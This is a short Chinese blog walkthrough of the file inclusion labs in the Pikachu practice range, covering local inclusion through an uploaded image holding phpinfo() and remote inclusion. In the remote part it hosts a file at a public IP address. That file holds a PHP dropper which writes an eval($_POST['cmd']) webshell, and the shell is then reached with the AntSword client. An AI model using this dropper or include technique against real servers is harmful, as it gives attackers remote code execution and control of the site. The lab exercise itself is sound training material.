当前位置: 首页 > article >正文

pikachu文件包含漏洞靶场攻略

一、File inclusion(local)(本地文件包含)

1.打开pikachu的本机包含文件靶场

2.随意提交查询

可以看到是get传参   可以在filename参数进行文件包含

3.准备好一个jpg文件

<?php phpinfo(); ?>将内容写到1.jpg中

点击上传文件 上传1.jpg

文件上传成功

4.filename后面输入../../../../1.php访问php文件

二、File Inclusion(remote)(远程文件包含)

一,修改配置

allow_url_fopen=on //默认打开

Allow_url_include=on //默认关闭

二,随意提交查询

三,宝塔公网上创建一个6.txt文件,

里面输入<?php fputs(fopen("1.php","w"),'<?php eval($_POST["cmd"]);?>')?>

四,filename后面输入http://47.121.212.101/6.txt

五,fileinclude目录下找到php文件

六,访问php文件,蚁剑连接


http://www.kler.cn/a/288990.html

相关文章:

  • vscode添加全局宏定义
  • Spring Boot 配置Kafka
  • lodash常用函数
  • 【分享-POI工具,Excel字段取值容错小工具】
  • petalinux-adi ---移植adi内核(一)
  • unity webgl部署到iis报错
  • 密钥分发与公钥认证:保障网络通信的安全
  • MySQL入门学习-MySQL的连接查询
  • MySQL——事务与存储过程(二)存储过程的创建(4)光标的使用
  • 【Linux学习笔记】protobuf相关操作
  • 数仓基础(九):各大公司实时数仓实践
  • Go锁 详解
  • k8s-使用Network Policies实现网络隔离
  • (二)、软硬件全开源智能手表,可全面高精度采集生命体征数据,进行健康检测。(HealthyPi Move)
  • 【Java中的三元运算符】
  • 书法图片自动扣字的批处理
  • leecode 31.下一个排列(Golang)
  • 深度学习100问27:什么是截断的BPTT
  • mysql的组从复制
  • 检测文件解析漏洞的工具
  • 技术Leader在训练团队思考力中的核心职责
  • MySQL常用的查询优化分析方法有哪些?
  • 【Qt】 QComboBox | QSpinBox
  • 【qt】qss使用
  • 钢铁百科:A633GrE钢板材质、A633GrE力学性能、A633GrE执行标准
  • JAVA - 关于防重复提交探讨